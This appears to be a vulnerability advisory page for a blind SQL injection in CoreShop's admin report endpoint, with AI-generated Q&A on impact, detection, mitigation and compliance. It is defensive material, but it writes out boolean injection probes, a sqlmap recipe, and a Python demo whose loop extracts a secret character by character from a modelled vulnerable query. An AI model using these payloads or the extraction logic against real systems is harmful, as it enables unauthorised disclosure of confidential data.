CVE-2026-22242
Blind SQL Injection in CoreShop Allows Confidential Data Disclosure

Publication date: 2026-01-08

Last updated on: 2026-01-08

Assigner: GitHub, Inc.

Description
CoreShop is a Pimcore enhanced eCommerce solution. Prior to version 4.1.8, a blind SQL injection vulnerability exists in the application that allows an authenticated administrator-level user to extract database contents using boolean-based or time-based techniques. The database account used by the application is read-only and non-DBA, limiting impact to confidential data disclosure only. No data modification or service disruption is possible. This issue has been patched in version 4.1.8.
Meta Information
Published: 2026-01-08
Last Modified: 2026-01-08
Generated: 2026-05-07
AI Q&A: 2026-01-08
EPSS Evaluated: 2026-05-05
Affected Vendors & Products (1 associated CPE)
Vendor: coreshop
Product: coreshop
Version / Range: up to and including 4.1.7
CWE
CWE-564: Using Hibernate to execute a dynamic SQL statement built with user-controlled input can allow an attacker to modify the statement's meaning or to execute arbitrary SQL commands. This is the weakness the record is tagged with; its text is specific to the Hibernate ORM, whereas the flaw described here is plain concatenation of a request parameter into a query, which is the general SQL injection weakness catalogued as CWE-89.
AI Powered Q&A
Can you explain this vulnerability to me?

CVE-2026-22242 is a blind SQL injection in CoreShop up to and including version 4.1.7, located in the admin reports feature. An authenticated administrator-level user can extract confidential database contents because request input is concatenated directly into SQL text without parameterization; the 'store' parameter in particular reaches the query without validation or a prepared statement, so boolean-based or time-based payloads can be used to infer data one true/false comparison at a time. The database user has read-only privileges, so data modification and service disruption are not possible. The fix replaces the unsafe query construction with parameterized queries using named placeholders. [1, 2]


How can this vulnerability impact me?

This vulnerability can lead to unauthorized disclosure of confidential data stored in the CoreShop database. An authenticated administrator-level user can exploit the blind SQL injection to extract sensitive information by manipulating SQL queries. However, because the database account used by the application is read-only and non-DBA, the impact is limited to data confidentiality only. There is no risk of data modification or service disruption from this vulnerability. [2]


How can this vulnerability be detected on my network or system? Can you suggest some commands?

Detection means testing the /admin/coreshop/report/get-data endpoint for blind SQL injection through the 'store' parameter, using an authenticated administrator session, since the flaw is not reachable without one. Boolean-based probing compares the response for a known-good value such as store=1 with store=1 AND 1=1 (which should return the same data) and store=1 AND 2=1 (which returns empty results); a time-based probe appends a condition built on a function such as SLEEP() and watches for a response delay proportional to the requested sleep. sqlmap can confirm the issue and enumerate what the read-only account can see; in outline, point it at the endpoint with -p store, supply the admin session cookie with --cookie, and restrict it to boolean and time-based techniques with --technique=BT, taking the exact request method and the other report parameters from a captured legitimate admin request. Because the database account is read-only, probing cannot alter data, but time-based payloads do load the database server, so test only instances you are authorised to assess. On the defensive side, a quick check is to search web-server or proxy logs for requests to that endpoint whose store value is anything other than a plain integer. [2]


What immediate steps should I take to mitigate this vulnerability?

The definitive fix is to upgrade CoreShop to version 4.1.8 or later, where the issue is patched. If you maintain a patched fork in the meantime, do what the upstream fix does: strictly cast the 'store' parameter to an integer, return empty results when the value is invalid (<= 0), and pass it to the query through a prepared statement with bound parameters instead of string concatenation; apply the same treatment to every other request parameter that reaches a query. Until the upgrade is deployed, reduce exposure by keeping the number of administrator-level accounts small, since exploitation requires one, and do not widen the privileges of the application's read-only database account, which is what currently caps the impact at disclosure. [2, 1]
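To make the mechanics concrete, here is an added example written for this page (it is not CoreShop's code and not the upstream patch). It models the vulnerable and the fixed report query in Python over an in-memory SQLite database with constructed sample rows, runs the boolean-based probe described above against both, and carries the blind extraction through to completion. The table and column names, the api_key secret and the function names are assumptions made for the demonstration; the SLEEP() function mentioned for time-based probing is a MySQL function that SQLite does not provide, so only the boolean-based technique is modelled.

```python
import sqlite3


def make_db():
    # Constructed sample schema and rows (not CoreShop's schema): a store
    # table the report legitimately reads, plus a table the report should
    # never expose.
    con = sqlite3.connect(":memory:")
    con.executescript("""
        CREATE TABLE store (id INTEGER PRIMARY KEY, name TEXT);
        CREATE TABLE api_key (id INTEGER PRIMARY KEY, secret TEXT);
        INSERT INTO store VALUES (1, 'Main'), (2, 'Outlet');
        INSERT INTO api_key VALUES (1, 'k3y');
    """)
    return con


def report_vulnerable(con, store):
    # Hypothetical model of the pre-4.1.8 pattern described on the page:
    # the request parameter is pasted straight into the SQL text.
    sql = "SELECT name FROM store WHERE id = " + str(store)
    return con.execute(sql).fetchall()


def report_fixed(con, store):
    # The fix pattern: strict integer cast, reject invalid or non-positive
    # values with an empty result, and bind the value via a named placeholder.
    try:
        store_id = int(store)
    except (TypeError, ValueError):
        return []
    if store_id <= 0:
        return []
    return con.execute(
        "SELECT name FROM store WHERE id = :store", {"store": store_id}
    ).fetchall()


def is_injectable(report, con):
    # Boolean-based probe: a tautology must behave like the baseline and a
    # contradiction must empty the result set. If either fails, the input is
    # not being parsed as part of the SQL statement.
    baseline = report(con, "1")
    tautology = report(con, "1 AND 1=1")
    contradiction = report(con, "1 AND 2=1")
    return bool(baseline) and tautology == baseline and contradiction == []


def extract_secret(report, con, max_len=32):
    # Blind extraction: the oracle only answers "rows or no rows", so each
    # character is recovered by binary search over its code point (about
    # seven requests per character). Past the end of the string substr()
    # yields '' and unicode('') yields NULL, which coalesce() turns into 0 so
    # that every comparison is false and the loop terminates.
    found = ""
    for pos in range(1, max_len + 1):
        lo, hi = 0, 127
        while lo < hi:
            mid = (lo + hi) // 2
            payload = (
                "1 AND (SELECT coalesce(unicode(substr(secret, %d, 1)), 0) "
                "FROM api_key WHERE id = 1) > %d" % (pos, mid)
            )
            if report(con, payload):
                lo = mid + 1
            else:
                hi = mid
        if lo == 0:
            break
        found += chr(lo)
    return found


if __name__ == "__main__":
    con = make_db()
    print("vulnerable injectable:", is_injectable(report_vulnerable, con))
    print("fixed injectable:     ", is_injectable(report_fixed, con))
    print("leaked via vulnerable:", repr(extract_secret(report_vulnerable, con)))
    print("leaked via fixed:     ", repr(extract_secret(report_fixed, con)))
```

Run as-is: the probe flags the concatenating version, the cast-and-bind version returns nothing for any value that is not a positive integer, and the extraction loop recovers the whole secret from the vulnerable version while getting nothing from the fixed one. The same probe shape is what a sqlmap boolean-based run performs against the real endpoint, with the request carrying the admin session cookie.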


How does this vulnerability affect compliance with common standards and regulations (like GDPR, HIPAA)?

The vulnerability allows an authenticated administrator-level user to extract confidential database information due to a blind SQL injection flaw. This unauthorized disclosure of confidential data could lead to non-compliance with data protection regulations such as GDPR and HIPAA, which mandate the protection of sensitive personal and health information. Although the database user is read-only and no data modification or service disruption is possible, the confidentiality breach poses a risk to compliance by potentially exposing protected data. The issue has been patched in version 4.1.8 to mitigate this risk. [2]

